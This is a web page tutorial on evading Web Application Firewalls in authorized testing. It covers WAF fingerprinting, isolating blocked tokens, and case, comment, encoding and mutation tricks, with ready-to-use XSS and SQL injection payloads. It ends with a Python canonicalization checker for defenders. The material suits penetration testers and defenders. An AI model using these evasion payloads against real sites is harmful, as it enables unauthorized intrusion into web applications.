Learn how to bypass a Web Application Firewall during authorized testing: fingerprint the WAF, find the filter boundary, then defeat it with encoding, case and comment tricks, and payload mutation. Step-by-step methodology with copy-ready examples.
Before trying to bypass anything, confirm a WAF exists and identify the vendor — each WAF (Cloudflare, Akamai, AWS WAF, Imperva, F5) has different rule sets and blind spots. Send a deliberately malicious request and watch for a block page, a 403/406/429, a generated Ray ID, or a CAPTCHA. Note the exact response so you can tell a block apart from an application error.
curl -s -o /dev/null -w '%{http_code}' 'https://target/?q=<script>alert(1)</script>' # baseline malicious probe (status code only)
GET /?id=1' OR '1'='1 HTTP/1.1 # same probe as a raw request line
Look for: cf-ray / x-akamai / x-amzn headers, Server banner, block-page wording
Isolate exactly what the WAF blocks. Submit each suspicious token on its own — a bare keyword, a single special character, an event handler — and record which ones trip the rule. The goal is to learn the smallest set of blocked tokens so you can rewrite the payload around them rather than guessing blindly.
q=script # keyword blocked?
q=onerror # event handler blocked?
q=' OR 1=1-- # SQL meta blocked?
q=%3Cscript%3E # does URL-encoding alone pass?
Most signature WAFs match on literal strings. Re-express the same payload so it no longer matches the signature but still executes after the application decodes it: mixed case, inline comments, double/Unicode/HTML encoding, and whitespace alternatives. Chain transforms in the Encoding Pipeline to test layered encodings the WAF normalizes inconsistently.
<ScRiPt>alert(1)</ScRiPt> # case variation
<img src=x onerror=alert`1`> # backtick call, no parens
1/**/UNION/**/SELECT/**/1,2,3-- # inline comments split keywords
%2553cript -> %53cript -> Script # double URL-encoding
<svg/onload=alert(1)> # slash instead of space
A single hand-crafted variant rarely lands on the first try. Generate dozens of mutations from one payload and replay them to find the one that slips through, then narrow to encodings that target your fingerprinted vendor. The Payload Mutator produces 50+ evasion variants; the WAF-Specific Encoder tailors output to 8 named WAFs.
Feed " OR 1=1-- " into the Payload Mutator -> replay all variants
Select the Cloudflare / Akamai / AWS profile in the WAF Encoder
Keep the first variant that returns the app response, not the block page
A request that is not blocked is not the same as a working exploit — confirm the payload actually executes (script fires, query returns injected data) before reporting. Record the exact bypass string, the WAF vendor, and the rule it evaded so the finding is reproducible. Recommend defense-in-depth: positive-security input validation and context-aware output encoding behind the WAF, never the WAF alone.
Verify: reflected payload executes / SQL returns injected column data
Document: vendor, blocked baseline, working bypass, decoded payload
Fix: validate + encode server-side; treat the WAF as one layer, not the control
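The layered-encoding weakness above comes down to the WAF matching the wire form while the backend and browser act on the decoded form. As an added example (not from this page or the payload-playground tool), the check below canonicalizes a parameter before signature matching and compares the result with a plain literal match on the page's own variants; the signature list, the slash-to-space rule, and the double-encoded `<script>` sample are assumptions constructed for this example.

```python
import html
import re
from urllib.parse import unquote

# Minimal literal signatures, an assumption for this example (real rule sets are far larger).
SIGNATURES = ("<script", " onerror=", " onload=", "union select", "or 1=1")

def canonicalize(value: str, max_rounds: int = 3) -> str:
    """Normalize a parameter to the form the backend and browser will act on,
    so signature matching happens on the decoded value, not the wire value."""
    current = value
    for _ in range(max_rounds):  # peel stacked URL / HTML-entity encodings
        decoded = html.unescape(unquote(current))
        if decoded == current:
            break
        current = decoded
    current = re.sub(r"/\*.*?\*/", " ", current, flags=re.S)  # SQL inline comments -> space
    # '/' between word characters acts as an HTML attribute separator (assumed rule)
    current = re.sub(r"(?<=\w)/(?=\w)", " ", current)
    current = re.sub(r"\s+", " ", current)  # collapse whitespace alternatives
    return current.lower()  # fold mixed case

def match_literal(value: str):
    """Case-insensitive literal match: the behaviour the page attributes to signature WAFs."""
    lowered = value.lower()
    return next((s for s in SIGNATURES if s in lowered), None)

def classify(raw: str) -> dict:
    """Compare a wire-form-only match with a match on the canonical form."""
    return {"literal": match_literal(raw), "canonical": match_literal(canonicalize(raw))}

# Constructed inputs mirroring the page's variants; the double-encoded <script> is added here.
SAMPLES = [
    "<ScRiPt>alert(1)</ScRiPt>",
    "<img src=x onerror=alert`1`>",
    "1/**/UNION/**/SELECT/**/1,2,3--",
    "%253Cscript%253E",
    "<svg/onload=alert(1)>",
    "' OR 1=1--",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        result = classify(sample)
        print(f"{sample!r:38} literal={result['literal']!r:14} canonical={result['canonical']!r}")
```

The comment-split UNION, the double-encoded tag and the slash-separated handler are all missed by the literal match and caught once canonicalized, which is the behaviour to verify in a WAF configuration before relying on its rules.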